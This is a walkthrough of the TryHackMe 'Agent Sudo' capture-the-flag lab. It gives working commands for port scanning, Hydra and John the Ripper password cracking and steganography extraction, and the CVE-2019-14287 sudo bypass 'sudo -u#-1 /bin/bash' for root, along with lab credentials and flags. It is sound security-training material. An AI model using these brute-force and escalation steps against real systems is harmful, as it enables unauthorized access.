Understanding Cybersecurity CTF: Agent Sudo

This Capture The Flag (CTF) challenge simulates a real-world cybersecurity scenario where you hack into a classified server hidden beneath the ocean. The goal is to uncover hidden information by performing enumeration, hash cracking, brute-force attacks, and privilege escalation—key techniques used in ethical hacking and penetration testing.

Agent Sudo is designed to test your ability to identify vulnerabilities, exploit weak credentials, and escalate privileges to gain full system control. Below is a structured walkthrough of the challenge, optimized for clarity and practical application.

Key Objectives

Enumerate open ports, services, and hidden directories
Crack hashes and brute-force passwords for FTP, ZIP files, and SSH
Escalate privileges by exploiting system vulnerabilities
Retrieve flags (user and root) to complete the challenge

Step-by-Step Walkthrough

1. Enumeration: Mapping the Target

Enumeration is the first step in any penetration test. It involves scanning the target to identify active services, open ports, and potential entry points.

Identifying Open Ports

Use nmap to scan for open ports and services:

nmap -sV -Pn -O -p- 10.10.209.115

Scan Results:

Port	Service	Version
21	FTP	vsftpd 3.0.3
22	SSH	OpenSSH 7.6p1 Ubuntu
80	HTTP	Apache httpd 2.4.29 (Ubuntu)

Note: The scan reveals three open ports: FTP (21), SSH (22), and HTTP (80). Port 80 is a common entry point for web-based attacks.

Discovering Hidden Directories

Use Gobuster to brute-force hidden directories on the web server:

gobuster dir --url http://10.10.209.115 --wordlist /usr/share/wordlists/dirb/common.txt

Key Findings:

/.htpasswd
/.hta
/.htaccess
/index.php
/server-status

Visiting http://10.10.209.115/index.php displays a message:

Dear agents, Use your own codename as user-agent to access the site. From, Agent R

Finding the Agent Codename

The message hints at using a user-agent to access restricted content. After testing single-letter codenames (e.g., A, B, C), the correct agent is revealed:

curl -A "C" -L 10.10.209.115

Response:

Attention chris, Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! From, Agent R

Key Takeaway: The agent’s username is chris.

2. Hash Cracking and Brute-Force Attacks

With the username chris identified, the next step is to brute-force credentials for FTP and other services.

Brute-Forcing FTP Password

Use Hydra to crack the FTP password:

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.209.115 ftp -I -V

Result:

[21][ftp] host: 10.10.209.115   login: chris   password: crystal

Credentials: chris:crystal

Downloading and Extracting Files

Connect to FTP and download the available files:

cute-alien.jpg
cutie.png

Use binwalk to extract hidden data from cutie.png:

binwalk -e cutie.png

This reveals a ZIP file (8702.zip) protected by a password.

Cracking the ZIP File Password

Use John the Ripper to crack the ZIP password:

zip2john 8702.zip > zip_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt

Result: Password is alien.

Extracting Hidden Messages

Inside the ZIP file, a text file contains a base64-encoded message:

echo "QXJlYTUx" | base64 --decode

Output: Area51

Use steghide to extract a hidden message from cute-alien.jpg:

steghide extract -sf cute-alien.jpg

Extracted Message:

Hi james, Glad you find this message. Your login password is hackerrules! Don’t ask me why the password looks cheesy, ask agent R who set this password for you. Your buddy, chris

Key Takeaways:

Second agent’s username: james

SSH password: hackerrules!

3. Gaining Access via SSH

With the credentials james:hackerrules!, connect to the server via SSH:

ssh james@10.10.209.115

Retrieving the User Flag

The user flag is located in james's home directory:

cat user_flag.txt

Flag: b03d975e8c92a7c04146cfa7a5a313c7

Investigating the Alien Photo

A file named Alien_autospy.jpg contains metadata hinting at a famous incident:

Answer: Roswell alien autopsy

4. Privilege Escalation: Gaining Root Access

Privilege escalation involves exploiting system vulnerabilities to gain root (administrator) access.

Checking Sudo Permissions

Run sudo -l to check james's sudo privileges:

sudo -l

Output:

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash

Vulnerability: The !root restriction can be bypassed using CVE-2019-14287, a flaw in sudo versions before 1.8.28.

Exploiting CVE-2019-14287

Run the following command to escalate privileges:

sudo -u#-1 /bin/bash

This grants root access. Retrieve the root flag:

cat /root/root.txt

Root Flag:

To Mr. hacker, Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine. Your flag is b53a02f55b57d4439e3341834d70c062 By, DesKel a.k.a Agent R

Bonus Answer: Agent R’s real name is DesKel.

Lessons Learned

Enumeration is critical: Always scan for open ports, services, and hidden directories.
Weak passwords are a liability: Brute-force tools like Hydra and John the Ripper can crack weak credentials.
Privilege escalation requires research: Exploiting CVEs (e.g., CVE-2019-14287) can grant root access.
Steganography hides data: Tools like steghide and binwalk can extract hidden messages from files.

Learn More

To deepen your cybersecurity skills, explore these resources:

TryHackMe: Hands-on CTF challenges and learning paths.
Hack The Box: Real-world penetration testing labs.
Exploit-DB: Database of known vulnerabilities and exploits.
OWASP Testing Guide: Best practices for web security testing.